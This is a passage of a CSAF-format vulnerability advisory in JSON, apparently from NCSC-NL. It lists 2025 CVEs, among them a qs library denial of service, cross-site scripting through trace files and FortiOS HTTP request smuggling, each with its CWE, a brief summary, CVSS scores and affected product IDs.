"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-12816 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-12816.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-12816"
},
{
"cve": "CVE-2025-15284",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"notes": [
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
},
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
},
{
"category": "other",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "other",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "description",
"text": "The qs library\u0027s `arrayLimit` option fails to enforce limits on bracket notation arrays, enabling denial-of-service attacks via memory exhaustion by parsing large arrays from user input.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-15284 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-15284.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-15284"
},
{
"cve": "CVE-2025-27769",
"cwe": {
"id": "CWE-923",
"name": "Improper Restriction of Communication Channel to Intended Endpoints"
},
"notes": [
{
"category": "other",
"text": "Improper Restriction of Communication Channel to Intended Endpoints",
"title": "CWE-923"
},
{
"category": "description",
"text": "Affected devices exhibit improper access control, enabling attackers to potentially access unauthorized services via the charging cable interface.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-27769 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-27769.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-27769"
},
{
"cve": "CVE-2025-40943",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"title": "CWE-79"
},
{
"category": "description",
"text": "Certain devices contain a vulnerability where trace files are insufficiently sanitized, enabling attackers to execute code by deceiving users into importing malicious trace files.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-40943 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-40943.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-40943"
},
{
"cve": "CVE-2025-55018",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"notes": [
{
"category": "other",
"text": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
"title": "CWE-444"
},
{
"category": "description",
"text": "An HTTP request smuggling vulnerability in Fortinet FortiOS allows unauthenticated attackers to bypass firewall policies by sending specially crafted headers, potentially compromising security.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-55018 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-55018.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
